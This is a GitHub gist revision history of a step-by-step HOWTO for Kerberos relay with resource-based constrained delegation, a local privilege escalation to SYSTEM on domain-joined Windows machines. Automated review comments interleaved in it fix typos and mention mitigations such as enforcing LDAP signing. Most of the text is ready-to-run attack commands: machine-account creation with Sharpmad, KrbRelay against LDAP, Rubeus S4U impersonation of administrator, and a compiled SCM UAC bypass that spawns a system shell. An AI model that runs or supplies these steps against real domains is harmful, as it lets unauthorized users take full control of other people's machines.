Revisions
tothi revised this gist
Nov 17, 2023 . 1 changed file with 8 additions and 0 deletions.
@@ -33,6 +33,14 @@ $o = ([ADSI]"LDAP://CN=evilcomputer,CN=Computers,DC=ecorp,DC=local").objectSID (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value ``` Alternative way (without knowing the full DN): ``` $f = "(&(objectCategroy=computer)(objectClass=computer)(cn=evilcomputer))" $s = ([ADSISearcher]$f).FindOne().Properties.objectSID (New-Object System.Security.Principal.SecurityIdentifier([byte[]]($s | Out-String -Stream), 0)).Value ``` 3.) Abuse the attribute `msDS-AllowedToActOnBehalfOfOtherIdentity` of the target (desktop12.ecorp.local) computer account by launching the awesome Kerberos Relay attack using [KrbRelay](https://github.com/cube0x0/KrbRelay).
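Review bot: the LDAP filter in the added alternative lookup misspells the attribute name: `(objectCategroy=computer)` should be `(objectCategory=computer)`. As written the AND clause references an attribute that does not exist in the schema, so `FindOne()` returns nothing and the subsequent `.Properties.objectSID` access fails on a null result. The byte-array conversion `[byte[]]($s | Out-String -Stream)` also round-trips every byte through a string; the first element of the property collection is already a `byte[]`, so `[byte[]]$s[0]` is the plainer and less fragile form.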
tothi revised this gist
Apr 27, 2022 . 1 changed file with 1 addition and 1 deletion.
@@ -86,7 +86,7 @@ SCMUACBypass.exe You should have a System shell in the end. :) +1.) Cleanup: remove the service created by the previous step (what launched `cmd.exe`), in the system shell: ``` sc delete UacBypassedService
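Review bot: the cleanup step is still numbered `1.)` although it follows step `5.)` in the file; renumbering it `6.)` keeps the sequence readable. The reworded sentence is an improvement, but "remove the service created by the previous step, which launched `cmd.exe`" would be clearer than the parenthetical "(what launched `cmd.exe`)". It would also help to state that `UacBypassedService` must match the service name registered by the compiled `SCMUACBypass.exe`; a reader who renames the service in the source will otherwise delete nothing and leave the service behind.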
tothi revised this gist
Apr 27, 2022 . 1 changed file with 6 additions and 0 deletions.
@@ -85,3 +85,9 @@ SCMUACBypass.exe ``` You should have a System shell in the end. :) +1.) Cleanup: remove the service created by the previous step and lanuched `cmd.exe` (in the system shell): ``` sc delete UacBypassedService ```
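Review bot: typo and grammar in the added step: "lanuched" should be "launched", and "the service created by the previous step and lanuched `cmd.exe`" reads as if the reader launched it; "the service that the previous step created to launch `cmd.exe`" is clearer. The step is also numbered `1.)` directly after step `5.)`; it should be `6.)`.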
tothi revised this gist
Apr 27, 2022 . 1 changed file with 9 additions and 0 deletions.
@@ -2,6 +2,15 @@ Short HOWTO about one use case of the work from Cube0x0 ([KrbRelay](https://github.com/cube0x0/KrbRelay)) and others. ## TL;DR No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers. Prerequisites: * LDAP signing not required on Domain Controller (default!) * Ability for the current domain user to add computers to the domain (ms-DS-MachineAccountQuota = 10 by default!) or an owned computer account ## Brief Kerberos Relay Attack adds a fake (or owned) computer account to the target's msDS-AllowedToActOnBehalfOfOtherIdentity
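Review bot: typo in the added TL;DR: "low-priviliged" should be "low-privileged". The two prerequisites listed are also the two controls that close this path, so the "No-Fix" wording deserves a qualifier right next to them: requiring LDAP signing on the domain controllers removes the first precondition, and setting `ms-DS-MachineAccountQuota` to 0 (or otherwise restricting who may add computer accounts) removes the second unless the attacker already holds a computer account. Stating that explicitly would make the hardening takeaway as visible as the attack.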
tothi created this gist
Apr 27, 2022.
@@ -0,0 +1,78 @@ # KrbRelay with RBCD Privilege Escalation HOWTO Short HOWTO about one use case of the work from Cube0x0 ([KrbRelay](https://github.com/cube0x0/KrbRelay)) and others. ## Brief Kerberos Relay Attack adds a fake (or owned) computer account to the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, making it possible to perform a Resource-Based Constrained Delegation Attack against the target. The result of the RBCD attack is Silver Ticket access to the target, which can be used for local admin access remotely or even locally (meaning privilege escalation) by patching the Win32 Service Control Manager to use Kerberos Authentication locally. ## Technical Steps for the PrivEsc 1.) Add a computer account with [SharpMad](https://github.com/Kevin-Robertson/Sharpmad) (or use an owned one): ``` Sharpmad.exe MAQ -Action new -MachineAccount evilcomputer -MachinePassword pass.123 ``` 2.) Get the SID of that computer object with PowerShell: ``` $o = ([ADSI]"LDAP://CN=evilcomputer,CN=Computers,DC=ecorp,DC=local").objectSID (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value ``` 3.) Abuse the attribute `msDS-AllowedToActOnBehalfOfOtherIdentity` of the target (desktop12.ecorp.local) computer account by launching the awesome Kerberos Relay attack using [KrbRelay](https://github.com/cube0x0/KrbRelay). First get a suitable port for COM: ``` CheckPort.exe ``` Then use the returned port value and the SID value from Step 2 for the attack: ``` KrbRelay.exe -spn ldap/dc1.ecorp.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3239103757-393380102-551265849-2110 -port 10 ``` For this working, LDAP signing on DC1 should not be required (default setting). Now the computer object `desktop12` should be allowed to act on behalf of the created/owned `evilcomputer` account. This was the key step for this attack. The following is generic RBCD Abuse. 4.) 
Use the [S4U Action](https://github.com/GhostPack/Rubeus#s4u) of [Rubeus](https://github.com/GhostPack/Rubeus) for getting Kerberos tickets with SPNs and impersonated to local admin access. First calculate the NTLM hash of the owned computer account password: ``` Rubeus.exe hash /password:pass.123 ``` And get a Kerberos ticket with the `HOST/DESKTOP12` SPN (using for SCM access later) and inject into the current session: ``` Rubeus.exe s4u /user:evilcomputer$ /rc4:DBA335196E8CE3DEDB7140452ADEE42D /impersonateuser:administrator /msdsspn:host/desktop12 /ptt ``` Note that computername without FQDN part should be used for the SPN (to make it match for the tool used in the next step). 5.) Patch the Win32 API in Service Control Manager for using Kerberos tickets in local authentication and privesc to `NT AUTHORITY\System` by creating a service (launching `cmd.exe`). Here it is from Tyranid: https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82 Compile it (using cmdline Visual Studio): ``` cl -DUNICODE SCMUACBypass.cpp advapi32.lib ``` And launch it (in the session where the `HOST/Desktop12` ticket is available, check it with `klist`): ``` SCMUACBypass.exe ``` You should have a System shell in the end. :)
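Review bot: several wording and consistency points in the initial file. "For this working, LDAP signing on DC1 should not be required" should read "For this to work, LDAP signing must not be required on DC1"; "impersonated to local admin access" in step 4 should be "impersonating a user with local admin access". The note that the SPN must use the short host name (`host/desktop12`) rather than the FQDN is important and belongs before the `Rubeus.exe s4u` command, since the command already depends on it. The values `-port 10`, the SID in `-rbcd`, and the RC4 hash in `/rc4:` are all environment-specific outputs of earlier steps; labelling them as such (for example "replace with the output of CheckPort.exe / Step 2 / the `hash` command") would stop readers copying the sample values verbatim. Finally, since the text presents "LDAP signing on DC1 should not be required (default setting)" as the precondition for the key step, the corresponding mitigation (enforce LDAP signing on the DC) belongs in the Brief section so the defensive reading of the HOWTO is not lost.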